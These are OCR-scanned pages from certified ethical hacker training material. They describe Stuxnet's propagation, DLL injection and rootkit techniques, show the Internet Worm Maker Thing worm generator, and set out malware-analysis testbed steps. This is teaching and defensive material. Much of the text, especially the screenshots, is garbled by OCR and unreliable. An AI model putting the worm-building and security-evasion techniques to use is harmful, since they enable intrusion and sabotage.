odule 07 Page 1070 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 66. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker W o rm A n a ly s is : S tu x n e t Stuxnet isa threat targeting a specific industrial control system likely in Iran, such as a g pipeline as or power plant 0 - 0 J The goal of Stuxnet isto sabotage that facility by reprogram ing program able log controllers m m ic (P C to operate as the attackers intend them to, m likely out of their specified boundaries L s) ost 0 0 S tu x n e t c o n ta in s m a n y fe a tu re s s u c h a s: ♦ 1 Self-replicates through removable drives exploiting a vulnerability allowing auto-execution Updates itself through a peer-to-peer mechanism within a LAN 2 Spreads in a LAN through a vulnerabilityinthe Windows Print Spooler Exploits a total of four unpatched Microsoft vulnerabilities Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability 8 Copies and executes itself on remote computers through network shares running a WinCC database server Contacts a command and control server that allows the hacker to download and execute code, including updated versions Contains a Windows rootkit that hide its binaries and attempts to bypass security products Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded 1 0 Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system h ttp ://w w w .sy m a n te c .co m Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C W o rm A n a ly s is : S tu x n e t S o u rc e : h t t p : / / w w w . s y m a n t e c . c o m S t u x n e t is a c o m p le x t h r e a t a n d m a l w a r e w i t h d iv e rs e m o d u l e s a n d f u n c t io n a l it ie s . T his is m o s t l y u se d t o g ra b t h e c o n t r o l a n d r e p r o g r a m i n d u s t r i a l c o n t r o l s y s t e m s (ICS) b y m o d if y in g c o d e o n p r o g r a m m a b l e lo g ic c o n t r o l l e r s (PLCs), w h i c h c r e a te a w a y f o r t h e a t t a c k e r t o i n t r u d e i n t o t h e c o m p l e t e s y s te m a n d la u n c h an a t t a c k by m a k in g c h a n g e s in t h e c o d e a n d ta k e u n a u t h o r i z e d c o n t r o l o n t h e s y s te m s w i t h o u t t h e k n o w l e d g e o f t h e o p e r a t o r s . S t u x n e t c o n ta in s m a n y f e a t u r e s such as: e S e lf- re p lic a te s th ro u g h re m o v a b le d r iv e s e x p lo itin g a v u ln e ra b ility a ll o w i n g a u to - e x e c u tio n Q S p re a d s in a LAN t h r o u g h a v u l n e r a b i l i t y in t h e W i n d o w s P r i n t S p o o l e r Q S p re a d s t h r o u g h S M B b y e x p l o i t i n g t h e M i c r o s o f t W i n d o w s S e rv e r S ervice RPC H a n d lin g R e m o t e C od e E x e c u tio n V u l n e r a b i l i t y © C op ies a n d e x e c u te s it s e lf o n r e m o t e c o m p u t e r s t h r o u g h n e t w o r k s h a re s r u n n i n g a W in C C d a t a b a s e s e r v e r M odule 07 Page 1071 Ethical Hacking and C ounterm easures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 67. Ethical Hacking and Countermeasures Viruses and W orm s 9 Exam 312-50 C ertified Ethical Hacker C op ies i t s e lf i n t o S te p 7 p r o je c t s in such a w a y t h a t it automatically executes w h e n t h e S te p 7 p r o je c t is lo a d e d 9 U p d a t e s it s e lf t h r o u g h a p e e r - t o - p e e r m e c h a n is m w i t h i n a LAN 9 E x p lo its a t o t a l o f f o u r u n p a t c h e d M i c r o s o f t vulnerabilities 9 C o n ta c ts a c o m m a n d a n d c o n t r o l s e r v e r t h a t a llo w s t h e hacker to d o w n lo a d a nd e x e c u te c o d e , i n c lu d in g u p d a t e d v e rs io n s 9 Contains a Windows rootkit that hide its binaries and attempts to bypass security products 9 F in g e r p r in t s a s p e c ific industrial control system a n d modifies code on t h e S ie m e n s PLCs t o p o t e n t i a l l y s a b o ta g e t h e s y s te m M odule 07 Page 1072 Ethical Hacking and C ounterm easures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 68. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker W o rm A n a ly s is : S tu x n e t ( C o n t ’d ) W injecting into atrusted p cess, hen ro S tuxnet m keep the injected code inthe ay trusted pro or instruct the trusted cess processto inject the code into another currently ru n g p cess n in ro CEH S tuxnet c n o sists of a large .dll file that contains m different exports an any d resources and two encrypted configuration b cks lo W henever an export iscalled, Stuxnet typically injects the entire D Linto another p L rocess and then just c the particular export alls The dropper com ponent ofStuxnet is aw rapper programthat contains all of the above com ponents stored in e itself in a section nam "stub" sid e Stuxnet hook Ntdll.dll to m onitor for dB*! requ to load specially crafted file < ests ‫ך‬ nam these specially craftedfilenam es; es are m apped to another locationinstead - a locationspecified b W y 32.Stuxnet W the threat isexecuted, the hen w rapper extractsthe .d file fromthe ll stu section, m it into m ory a a b aps em s m odule, and c one of the exports alls q q It u e a sp s s ecial m ethod d ned to b esig ypass behavior blocking and host intrusion-protection based technologiesthat m onitor LoadLibrarycalls W lH k tiH W h ttp :/ / w w w .s y m a n te c .co m Copyright © by E&Coincil. All Rights Reserved. Reproduction is Strictly Prohibited. W o r m A n a l y s i s : S t u x n e t ( C o n t ’d ) S o u rc e : h t t p : / / w w w . s y m a n t e c . c o m S t u x n e t c o n s is ts o f a la rg e .dll file t h a t c o n t a in s m a n y d i f f e r e n t e x p o r t s a nd r e s o u r c e s a n d t w o e n c r y p t e d c o n f i g u r a t io n blo cks. It h o o k s N t d ll . d l l t o m o n i t o r f o r r e q u e s ts t o lo a d s p e c ia lly c r a f t e d f ile n a m e s ; th e s e s p e c ia lly c r a f t e d f i l e n a m e s a re m a p p e d t o a n o t h e r l o c a t io n in s te a d , a l o c a t io n s p e c ifie d by W 3 2 . S t u x n e t . T h e d r o p p e r c o m p o n e n t o f S t u x n e t is a w r a p p e r p r o g r a m t h a t c o n t a in s all c o m p o n e n t s s t o r e d in s id e i t s e lf in a s e c tio n n a m e " s t u b . " W h e n t h e t h r e a t is e x e c u te d , t h e w r a p p e r e x tr a c ts t h e .dll file f r o m t h e s tu b s e c tio n , m a p s it i n t o m e m o r y as a m o d u l e , a n d calls o n e o f t h e e x p o r ts . W h e n e v e r an e x p o r t is c a lle d , S t u x n e t t y p i c a l l y in je c ts th e e n t i r e DLL i n t o a n o t h e r p ro c e s s a n d t h e n j u s t calls t h e p a r t i c u l a r e x p o r t . W h e n i n j e c t i n g i n t o a t r u s t e d p ro ce ss, S t u x n e t m a y k e e p t h e i n je c te d c o d e in t h e t r u s t e d p ro c e s s o r i n s t r u c t t h e t r u s t e d p ro c e s s t o i n j e c t t h e c o d e i n t o a n o t h e r c u r r e n t l y r u n n i n g p ro ce ss. It uses a sp ecial m e t h o d d e s ig n e d t o b ypass b e h a v i o r b lo c k in g a n d h o s t i n t r u s i o n - p r o t e c t i o n based te c h n o l o g i e s t h a t m o n i t o r Load L ib ra r y calls. M odule 07 Page 1073 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 69. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker W o rm A n a ly s is : S tu x n e t c EH fertNM [U*4 H akM ( C o n t ’d ) Check CFG Infects removable drives Infection Routine Flo w Inject in service, call export 32 Infects Step 7 projects Inject in Step 7 & call export 32 ......... A.......... Create global m utexes --------* -------Hides malicious files Create rootkit service reg keys Inject in Step 7 & call export 32 Set file tim es Exit * Create global mutex Decrypt resource 201 & 242 & w rite to disk C re ate .p n f & ■ files cfe Rootkit files V >‫׳‬ 1 M rxd s.sys M rxcls.sys ------------- * ------------Version OK Date<06/24/2012 Decrypt & load self from disk. Call export 6 - get version Compare running version number and version on disk h ttp ://w w w .sy m a n te c .co m Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W o r m A n a l y s i s : S t u x n e t ( C o n t ’d ) S o u rc e : h t t p : / / w w w . s y r n a n t e c . c o m I n f e c tio n R o u tin e F lo w S t u x n e t ch e c k s if it has a d m i n i s t r a t o r r ig h ts o n t h e c o m p u t e r . S t u x n e t w a n t s t o ru n w i t h t h e h ig h e s t p r iv ile g e p o s s ib le so t h a t it has p e r m is s io n t o t a k e w h a t e v e r a c tio n s it likes o n t h e c o m p u t e r . If it d o e s n o t h a v e A d m i n i s t r a t o r r ig h ts , it e x e c u te s o n e o f t h e t w o z e r o - d a y e s c a la tio n o f p r iv ile g e a tta c k s d e s c r ib e d in t h e f o l l o w i n g d ia g r a m . If t h e p ro c e s s a lr e a d y has t h e r ig h ts it r e q u ir e s , it p r o c e e d s t o p r e p a r e t o call e x p o r t 16 in t h e m a in .dll file . It calls e x p o r t 16 b y u sin g t h e in j e c t i o n t e c h n i q u e s d e s c r ib e d in t h e I n je c tio n T e c h n i q u e s e c tio n . W h e n t h e p ro c e s s d o e s n o t h a v e a d m i n i s t r a t o r r ig h ts o n t h e s y s te m , it tr i e s t o a t t a in th e s e p riv ile g e s by u sin g o n e o f t w o z e r o - d a y e s c a la t io n o f p riv ile g e a tta c k s . T h e a t t a c k v e c t o r u sed is b ase d o n t h e o p e r a t i n g s y s te m o f t h e c o m p r o m i s e d c o m p u t e r . If t h e o p e r a t i n g s y s te m is W i n d o w s V ista , W i n d o w s 7, o r W i n d o w s S e rv e r 2 0 0 8 R2, t h e c u rre n tly u n d is c lo s e d Task S c h e d u le r E sca la tio n o f P riv ile g e v u l n e r a b i l i t y is e x p l o i t e d . If t h e o p e r a t i n g s y s te m is W i n d o w s XP, t h e c u r r e n t l y u n d is c lo s e d w in 3 2 k .s y s e s c a la t io n o f p r iv ile g e v u l n e r a b i l i t y is e x p l o i t e d . M odule 07 Page 1074 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 70. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker If e x p l o i t e d , b o t h o f th e s e v u ln e r a b i l it ie s r e s u lt in t h e m a in .dll file r u n n i n g as a n e w pro ces s, e i t h e r w i t h i n t h e csrss.exe p ro c e s s in t h e case o f t h e w in 3 2 k .s y s v u l n e r a b i l i t y o r as a n e w ta s k w i t h a d m i n i s t r a t o r r ig h t s in t h e case o f t h e Task S c h e d u le r v u ln e r a b i l it y . T h e c o d e t o e x p l o i t t h e w in 3 2 k .s y s v u l n e r a b i l i t y is s t o r e d in r e s o u r c e 2 50 . D e ta ils o f t h e W in 3 2 k .s y s V u l n e r a b i l i t y a n d t h e Task S c h e d u le r v u l n e r a b i l i t y c u r r e n t l y a re n o t re le a s e d as p a tc h e s a re n o t y e t a v a ila b le . A f t e r e x p o r t 15 c o m p le t e s t h e r e q u i r e d ch ecks, e x p o r t 16 is ca lle d . E x p o r t 16 is t h e m a in in s t a l l e r f o r S t u x n e t. It ch e cks t h e d a t e a n d t h e v e r s io n n u m b e r o f t h e c o m p r o m i s e d c o m p u t e r ; d e c r y p ts , c r e a te s , a n d in s ta lls t h e r o o t k i t file s a n d r e g is t r y keys; in je c ts it s e lf i n t o t h e s e rv ic e s .e x e p ro c e s s t o in f e c t r e m o v a b l e d riv e s ; in je c ts i t s e lf i n t o t h e S te p 7 p ro c e s s t o in f e c t all S tep 7 p r o je c ts ; sets u p t h e g lo b a l m u t e x e s t h a t a re used t o c o m m u n i c a t e b e t w e e n d i f f e r e n t c o m p o n e n t s ; a n d c o n n e c t s t o t h e RPC s e rv e r. E x p o r t 16 f i r s t ch e c k s t h a t t h e c o n f i g u r a t i o n d a ta is v a lid , a f t e r t h a t it c h e c k s t h e v a lu e " N T V D M TRACE" in t h e f o l l o w i n g r e g is t r y key: H K E Y _ L O C A L _ M A C H I N E S O F T W A R E M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n M S - D O S E m u la tio n ( C o n t ’d ) Error >‫־־‬ Inject in Step7 & call export 32 Inject in service, call export 32 C heck C G F A.......... Equal < r~ R key NTVDM eg Trace=19790529 Infects Step 7 projects Create global m utexes Past deadline <----- Date<06/24/2012 ^ : H ides : m alicious : files D ate OK C heck O S XP o r less Create rootkit service reg keys ■ Inject in Step7 & call export 32 V ista o r h ig h e r V Set D C AL y Set S C AL V Set file tim es ....... V Create global m utex r> V E xit ---------- A Oem 7a.pnf C r e a te .p n f & Decrypt reso urce 201 & 242 & w rite to disk Rootkit files .cfgfiles j . File OK Date<06/24/2012 Decrypt & load se lf fro m d isk. Call export 6 - get versio n Com pare running ve rsio n n u m b eran d versio n on disk FIGURE 7.23: Infection routine Flow M odule 07 Page 1075 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 71. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker - Worm Maker: Internet Worm Maker Thing Internet Worm Maker Thing C EH Version 4.00: Public Edition IWTFRNFT WORM MAKFR THING V4 Pyos olod: le je s C Avte aodO a c a Pyas n te f C n ltvose ti l D 0 M V 0 M Y f~ Ccc ytc!Rrr tsbSsfl ea se I Dfc:WcnSaty r Cre‫גמז‬Tx ral tars eri f hg2 0 et a O R s fe‫ז וגוז‬Sary a C Rdm cvteaod UTsalto'WSrprBowic ‫־‬te a oly ti a »>as I- Db 1 0en n A I LoSn - opo d u CnefativT py0d: I- Db Mo cn h co c ar 3(3s V s fc 5 Saty a o o c r r eec p tdDdto 1| IN CAC HNE r D tditR u iC a nn d r Dsabte Sh_:d:vwn 1 RmeMwre - DM aa tsoe l av 1 HdrAI Drives “ WI dS[ ]N e nueC o tc e I” Db L3 s te0“ s 0 r Dsabte Task Manager 1 Heacewtoos - 3 fl otcicdw eFV nn O tp P th u ut a : I- DkW W ; nfcMIWeb P Osobfc Keybord r ‫ כ*ז‬Search Corcard n C rru tA tiv s o p n iru r 5 r uB o ‫©׳®״‬x -nrt r C pTE Spo r BsabteMDuse o leoX upr m E t r—ChangeC puter om 1 CptrWaw “ P M3 a e 0 e 3 g Bx U: R L Sralr Oios cedg p n t Tifle: Srtjp ta : M5e‫*׳‬rt .te0» r‫ ־‬Cne hecn h gC Io a v f‫ ־‬C ~ hangFETilrBar' F GaRg ySrtu lo l «tb ta p b n * *I* C.EZ O D»: UX.K: ‫׳‬d* Text r LciRcfr Srt-p oo cov ta Patv |CVdwJ1 |1 :>n0:Y 0 r WgnhlMk n oS o to e c Icon: Ado otetMu“1 dTCnx e n r SrtASrc ta #e e v f~Cag W eatoeTt I---------hne n A* yr » r Otletr o f flkler M r Cn■o*T t h ?Cd tu a tab r rngk! 'itjr t14 > r < «mnS rtu S1 a ta p f~ S S p ‫ ־‬ot***' tam r * n Sr p «(h ta tu I” Ita n to p la Srtj r DU Rsd e lc cct a f O « P1 r>1.««» n !:lr »ia » •• r Chaw Reo Owner Owner: I ---------- Tw (M*001flf»)i it a f“ OoenCdOrtves Lock Worktlattn P Do*‫׳‬tood file M3r«’ | P Cac Wtoc hne a pr fe«10rlIU: U: R L I ----------r !‫י‬r ‫ _ ״‬J •‫ ו‬m ‫י‬ ? l~ Kba Do e or Ik y d I Be ce O - luSr mf tncoOo: fett n p r Be r In cBtFs fet a ie I In c‫־‬sPs ” fetA ie I WtVcRs - e o fc c Etrs xa: r He rsle idWfi s u IfY Ikd hPgmee o e Tar r Ptw u oa i /isl ‫י׳ -וי־‬ M u mfulhr^lnoi. oi tp://x< «tra IfY K nA rqA uV o ro i^lH b t 0 u o 5 PHdrr tt-lp5«t1 tih tcTinc AuwT» i Pl.yn (S Purr: I Ry R *W). ‫<.־‬k ‫״‬ n n« p C n l P tw o tro « l PA TFvrte d oao s d i r C a g R gO sn b n h n e e rg sa o r CRIMor*•*‫׳‬ OfQansator!: r Owncer*< PEcte a atfe x u DW d e a Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W o rm M a k e r: In te rn e t W o rm M a k e r T h in g In te rn e t W o rm M a k e r T h in g is a t o o l s p e c ific a lly d e s ig n e d f o r g e n e r a t in g a w o r m . T he se g e n e r a t e d I n t e r n e t w o r m s t r y t o s p re a d o v e r n e t w o r k s t h a t a re b a s ic a lly p re s e t in vasio n p ro xy a tta c k s t h a t t a r g e t t h e host te c h n ic a lly , p o is o n it, a n d m a k e a base a n d p la n s t o la u n c h t h e a t t a c k in f u t u r e . T h e w o r m s w o r k i n d e p e n d e n t l y . A n I n t e r n e t w o r m se nd s c o p ie s o f i t s e lf via v u ln e r a b l e c o m p u t e r s o n t h e I n t e r n e t . M odule 07 Page 1076 Ethical Hacking and C ounterm easures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 72. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Internet Worm Maker Thing Vernon 4.00:• Public Edition INTERNET W ORMM AKFR THING V 4 r^ d w ' B m ‫ו‬ O CfcMWf -n rd iii i S w i h f ‫ -ן‬Owng■ N 0 0 » T««t Om M» Norton Saa**y ng*• j w + t M **1rtan Scr** > 0d r Q F A*vMadau<(ue r RxSOMnorou•! 1 1 r — — r* *■ I S J Y oa r **KtlMNn I --------r la‫־‬pS«Lrt r Whcttor*• r EM UM r r 1acj1iU .l1 9u r M r lM t tr a a K * kwlx r D aFte am r M>a‫׳‬a.*- T ( r * * Stork• r C a g O Ic n h n e ft* o D ll E1E. ICO. to * » r M dH C aranrlM n r OwttCMTDi r »* < Jtt. •<> ‫ מ‬fou L*cd Tho P f Ob V t|f» Q AtXfcif A S _ r r Urrto«*D«ea r T MMnSUrtk• CualooiCadt * a y t t » t Haunq A PVjgr p — S p a n * Stork• r Nndtnvks r rm ^ u l d w i ). r fim wiUart• r 0 C ‫״‬n * « AnM nj* (i *H ggvM H r r i« * i»nr p Chr 9 1 C«M 1 > Pwl r Q BM D a g n ! S S r * K tr t« r t o r omaetFrfil ' I r Cw^T«e*s>«DB1‫׳‬ r n o t M in e C C u k iU r t O In U > H N M a O ueut*a»: r Add To F*«nte» te n rid W im CRiNarar r Ogm trn tT m FIGURE 7.24: Internet Worm Maker Thing M odule 07 Page 1077 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 73. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker M o d u le F lo w C EH V iru s and W orm s C on cep ts Types o f V iruses C o m p uter W orm s P en etratio n Testing C ounter• m easures M o d u le F lo w — M a l w a r e a na lysis is d e f i n e d as t h e a c tio n o f t a k i n g m a l w a r e s e p a r a t e ly a p a r t f o r s t u d y i n g it. It is u s u a lly p e r f o r m e d f o r v a r io u s r e a s o n s such as f o r f i n d i n g t h e v u l n e r a b i l i t i e s t h a t a re e x p l o i t e d f o r s p r e a d in g t h e m a l w a r e , t h e i n f o r m a t i o n t h a t w a s s to le n , a n d p r e v e n t i o n t e c h n i q u e s t o be ta k e n a g a in s t it f r o m e n t e r i n g t h e s y s te m o r n e t w o r k in f u t u r e . , 4‫, י‬ V iru s and W o rm s C o nc e p t ^ • .'V M a l w a r e A n a ly s is C o u n te rm e a s u re s T yp es o f V iruses •4 — v‫— ׳‬ s C o m p u te r W o rm s ^ P e n e tra tio n T es tin g D e t a ile d i n f o r m a t i o n a b o u t t h e m a l w a r e a na ly sis p r o c e d u r e is e x p la in e d in t h e n e x t f e w slides. M odule 07 Page 1078 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 74. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker What is Sheep Dip Computer? C EH (crtifwd 1 tthKjl IlMkM Sheep dipping refers to the analysis of suspect files, incoming m essages, etc. for malware A sheep dip computer is installed with port monitors, file monitors, network monitors and antivirus software and connects to a network only under strictly controlled conditions Run user, group permission and process monitors Run device driver and file monitors Run port and network monitors Run registry and kernel monitors Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W h a t Is a S h e e p D ip C o m p u te r ? — S h ee p d ip p i n g r e fe r s t o t h e a n a ly s is o f s u s p e c t file s , i n c o m i n g m essa ge s, e tc . f o r m a lw a re . T his " s h e e p d i p p e d " c o m p u t e r is is o la te d f r o m o t h e r c o m p u t e r s o n t h e n e t w o r k t o b lo c k a n y v iru s e s f r o m e n te rin g th e s y s te m . B e fo r e t h i s p r o c e d u r e is c a rr ie d o u t, any d o w n lo a d e d p r o g r a m s a re sa ved o n e x t e r n a l m e d ia such as C D -R O M s o r f l o p p y d is k e t t e s . A s h e e p d ip c o m p u t e r is in s ta lle d w i t h p o r t m o n i t o r s , file s m o n it o r s , n e t w o r k m o n it o r s , a nd a n t i v i r u s s o f t w a r e a n d c o n n e c ts t o a n e t w o r k o n l y u n d e r s t r i c t l y c o n t r o l l e d c o n d i t i o n s . A s h e e p d ip c o m p u t e r : 0 Runs p o r t a n d n e t w o r k m o n i t o r s 0 Runs user, g r o u p p e r m is s io n , a n d p ro c e s s m o n i t o r s 0 Runs d e v ic e d r i v e r a n d f i l e m o n i t o r s 0 Runs r e g is t r y a n d k e r n e l m o n i t o r s M odule 07 Page 1079 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 75. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Anti-Virus Sensors System s B CEH Anti-virus system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans. They are used a long with sheep dip computers Netw ork if Anti-Virus System a * .....□ System 1 Anti-Virus Anti-Spyware Anti-Trojan System 2 Anti-Spamware Allowed Traffic a Reflected **► Traffic Internet System 3 EE Anti-Phishing Email-Scanner Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. A n tiv iru s S en so r S y s te m s A n a n t i v i r u s s y s te m is a c o ll e c t i o n o f c o m p u t e r s o f t w a r e t h a t d e t e c t s a n d a n a ly ze s v a r io u s m a l i c io u s c o d e t h r e a t s such as v iru s e s , w o r m s , a n d T ro ja n s . T h e y a re u sed a lo n g w i t h s h e e p d ip c o m p u t e r s . Network B S y s te m Anti-Virus System ..... H 1 S y s te m ‫►י‬ 2 Anti Virus Anti Spyware • Reflected Traffic 1 Allowed Traffic U M Anti Trojan Allowed Traffic Anti Spamware System 3 ** Reflected * * > Traffic Internet m Anti-Phishing Email-Scanner FIGURE 7 .2 5 : W o rk in g o f A n tiv iru s S enso r S ystem s M odule 07 Page 1080 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 76. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker A n a n t i v i r u s s y s te m in c lu d e s a n t iv ir u s , a n t i - s p y w a r e , a n t i- T r o ja n , a n t i - s p a m w a r e , a n ti- P h is h in g , an e m a il s c a n n e r , a n d so o n . U su a lly, it is p la c e d in b e t w e e n t h e n e t w o r k a n d I n t e r n e t . It a llo w s o n l y g e n u i n e t r a f f i c t o f l o w t h r o u g h t h e n e t w o r k a n d b lo c k s m a l i c io u s t r a f f i c f r o m e n t e r i n g . As a re s u lt, it e n s u re s n e t w o r k s e c u r it y . M odule 07 Page 1081 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 77. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker M alware A nalysis Procedure: Preparing Testbed Isolate the systemfromthe D isable the 'shared network by ensuring that the folders', and the'guest NIC card is in "host only" m ode isolation' C EH Copy the malware over to the guest O S * ‫ר‬ ‫■אי‬ fc c a ‫׳‬ 0 Install guest OS into the Virtual PC/ VMWare Install VMWare or Virtual PC on the system Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. M a lw a re A n a ly sis P ro c e d u re : P re p a r in g T e s tb e d M a l w a r e a na lys is p r o v id e s in - d e p t h i d e n t if ie s e m e r g i n g te c h n ic a l t r e n d s f r o m u n d e r s t a n d i n g o f e a ch in d iv id u a l s a m p le a nd th e la rg e c o lle c t io n s o f m a lw a re s a m p le s . T h e s a m p le s o f m a l w a r e a re m o s t l y c o m p a t i b l e w i t h t h e W i n d o w s b i n a r y e x e c u t a b l e . M a l w a r e a na lys is is c o n d u c t e d w i t h a v a r i e t y o f goals. T h e f o l l o w i n g is t h e p r o c e d u r e f o r m a l w a r e a na lys is p r e p a r i n g T e s tb e d : 0 In sta ll V M W a r e o r V i r t u a l PC o n t h e s y s te m 0 In sta ll g u e s t OS i n t o t h e V i r t u a l P C / V M W a r e 0 Is o la te t h e s y s te m f r o m t h e n e t w o r k b y e n s u r in g t h a t t h e NIC c a rd is in " h o s t o n l y " mode 0 D isab le t h e s h a r e d f o l d e r s a n d t h e g u e s t i s o l a t i o n 0 C o p y t h e m a l w a r e o v e r t o t h e g u e s t OS M odule 07 Page 1082 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 78. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Malware Analysis Procedure 1. Perform static analysis when the malware is inactive 2. Collect information about: 0 String values found in the binary with the help of string extracting tools such as B inText e The packaging and com pressing technique used with the help of com pression and decom pression tools such as U X P UPX B in Te x t 11■ - ° Swxeh | r,1* | Htto | P|?lO «can [CU A nfc«lc1> « 1tnV dnw D1klap1« u e> <p TiroUfcan 0109 me• T«41ia> 37310t* 0 1 1364G | K fbw i iM w fp A C OOOO O OOOCM A ' 1‫׳ י‬ 1 A ‫ ויו‬i ll 1.V; a ccoocaxcxc A C O C O G7 C OO C 28 A C O O O G9 O O O C 2F a ; ‫זץי;י;ווו;ווי‬ O C 3C C D 000040 000030000110 O C 000228 C 03C OC C 03000Q 250 OC C 03000G 278 O G 00029f O 03G O CCC3C0013C A :000000C0928 0C 0030001528 /. ‫ ׳‬m nvin: OC003000IA44 /. ‫ וו‬i i f : ‫י‬h OC003000IA70 A XO O XO CCE9C O C 001A C 03C 3C A 3C X O C C 0C OO CC3 CC30001AC 8 A :O O O C E O 0C O O OCF 0030001A FO a :coocaxtfiB O 003C C 1001B 18 1 1 f~ 0 TH Administrator: C:Windowssystem32cmd.exe D:sCEH T0013CEH v 8 Module 07 U lru s e s and W ornsNConpression lUPXNupx306«#supx306t#>upx.exe U ltim a t e P a c k e r f u r e X e c u ta b le s Copyr i if 1 1. <C> 1996 1 2011 IPX 3.R*w Markus O berliiinw r. L a s z lo M o ln ar 0. Jo h n Rr I Usage: upx I ‫ ־‬I2 3 4 5 6 7 *9 d It Mil. 1 I- q u f k ] -I ‫־‬d -t -h dau Qitbc 0 Z3 Mu lsf“ c M1F aue ‫׳‬e rt ro « 0 ©1 1 P iC KEMIE132 G«norj|_RcpoMM FIh To o o OM FtoToKoop 1-0 f i l e ! e im p ress f a s t e r decom press t * s t com pressed f 11• g i v • n o r • h e lp -< j - o F IL k ~f -k F ile .. com prass b u t t e r l i s t ronppRssRd f i l e d is p la y u r n ion imnb• d is p la y t o f t w M lie • It• q u l* t w r i t • o u tp u t t o ' P I L k ' f o r c e c o n p ro s c io n o f o u a p ic io u o I kocp backup f i l o • e x e c u ta b le s to <de>conpre3a L wolw o nF lyp e inm JPX con es w it h ABSOLUTELY NO WARRANTY; f o r R*pcrtnaFlw P ile .. *up* - - h e lp ' f o r n ore d e t a ile d h e lp . h ttp://www. mcafee.com s i t h t tp :/ '/ u p x .3 f . h ttp://upx.sourceforge.net Copyright © by EG-Goilicil. All Rights Reserved. Reproduction is Strictly Prohibited M a lw a re A n a ly sis P ro c e d u re S te p 1: P e r f o r m s ta tic a n a ly sis w h e n t h e m a l w a r e is in a c tiv e S te p 2: C o lle c t i n f o r m a t i o n a b o u t : Q S trin g v a lu e s f o u n d in t h e b in a r y w i t h t h e h e lp o f s tr in g e x t r a c t i n g t o o l s such as B in T e x t Q T h e p a c k a g in g a n d c o m p r e s s i n g t e c h n i q u e u sed w i t h t h e h e lp o f c o m p r e s s i o n a nd d e c o m p r e s s i o n t o o l s such as UPX BinText S o u rc e : h t t p : / / w w w . m c a f e e . c o m B in T e x t can e x t r a c t t e x t f r o m a n y k in d o f file a n d in c lu d e s t h e a b i l it y t o f i n d p la in ASCII t e x t , U n ic o d e ( d o u b l e b y te ANSI) t e x t , a n d r e s o u r c e s trin g s , p r o v id i n g u s e fu l i n f o r m a t i o n f o r e ach it e m in t h e o p t i o n a l " a d v a n c e d " v i e w m o d e . M odule 07 Page 1083 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 79. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker _ BinText 3.0.3 ‫ם‬ Search | Filter | Help | F (0s a |C:Ms rs d n tra rN e k p s tipe e ile c n J e ’A mts to D s to V e x I? A van v w d ced ie F ps ile o A 00000000004D A 000000000110 A 000000000228 A 000000000250 A 000000000278 A 00000000029F A 0 0 000006B 00 E A 00000000090C A 000000000928 A OOO O O4 OOOOE4 A 000000000E 70 A O OOOO9 OOOOEC A OOOOOC OOOOE8 A 000000000E 0 F A 000000000F 18 a n n n n nnnnnF 44 < [ III Ra y ed M mp s e o I© 00003000004D 0 000030000110 0 000030000228 0 000030000250 0 000030000278 0 00003000029F 0 0000300012 E 0 B 0000300015 C 0 0 000030001528 0 000030001A 44 0 000030001A 70 0 000030001A C 0 9 000030001A 8 0 C 000030001A 0 0 F 000030001818 0 nnnrtw 44 n n1R B we ro s £0 Tim taken:0.109 s c Te t s e 37340b te (36.4 K e e s x iz : y s 6) A f Tx et !T isp g mc n o b ru inD Smd h ro ra a n t e n O o e u R icheW l te t x d ta a rsc » 0 re c (o 